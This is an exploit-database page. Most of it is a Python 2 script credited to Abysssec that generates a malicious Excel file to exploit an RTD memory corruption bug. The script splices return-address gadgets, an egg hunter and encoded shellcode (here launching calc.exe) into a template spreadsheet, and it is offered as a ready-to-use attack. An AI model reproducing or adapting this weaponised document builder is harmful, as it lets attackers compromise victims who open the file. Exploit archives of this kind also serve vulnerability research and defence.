Lucene search
K

Excel-RTD-Memory-Corruption

🗓️ 07 Jan 2015 12:39:14Reported by AbysssecType 
exploitpack
 exploitpack
👁 16 Views

Generating Excel file for memory corruption with shellcode and egg hunte

Code
import sys
 
def main():
    
    try:
        fdR = open('src.xls', 'rb+')
        strTotal = fdR.read()
        str1 = strTotal[:4509]
        str2 = strTotal[5013:15000]
        str3 = strTotal[15800:]
         
        eip = "\xAd\x57\x00\x30"    # pop pop ret
        jmp = "\xF7\xC2\x03\x30"    # call esp
         
        #Egg Hunter 
        eggHunter = ""
        eggHunter += "\x90\x90\x90"
        eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
        eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"    
         
        # shellcode calc.exe
        shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
         
        if len(eggHunter) > 266:
            print "[*] Error : Shellcode length is long"
            return
        if len(eggHunter) <=266:
            dif =266 - len(eggHunter)
            while dif > 0 :
                eggHunter += '\x90'
                dif = dif - 1
                 
                 
        if len(shellcode) > 800:
            print "[*] Error : Shellcode length is long"
            return
        if len(shellcode) <= 800:
            dif = 800 - len(shellcode)
            while dif > 0 :
                shellcode += '\x90'
                dif = dif - 1
                 
        fdW= open('exploit.xls', 'wb+')
        fdW.write(str1)
        fdW.write("\x41\x41\x41")    # padding
        fdW.write(jmp)
        fdW.write(eggHunter)                
        fdW.write("\xeb\x06\x41\x41")   
        fdW.write(eip)
        fdW.write("\x81\xc4\x24\x16\x00\x00")  # add esp,2016
        fdW.write("\xc3")  #ret
         
        i = 0
        while i < 54 :
            fdW.write("\x41\x41\x41\x41")    # padding
            i = i + 1
             
        fdW.write(str2)
        fdW.write(shellcode)
        fdW.write(str3)
         
        fdW.close()
        fdR.close()
        print '[-] Excel file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                 
if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jan 2015 12:39Current
0.2Low risk
Vulners AI Score0.2
16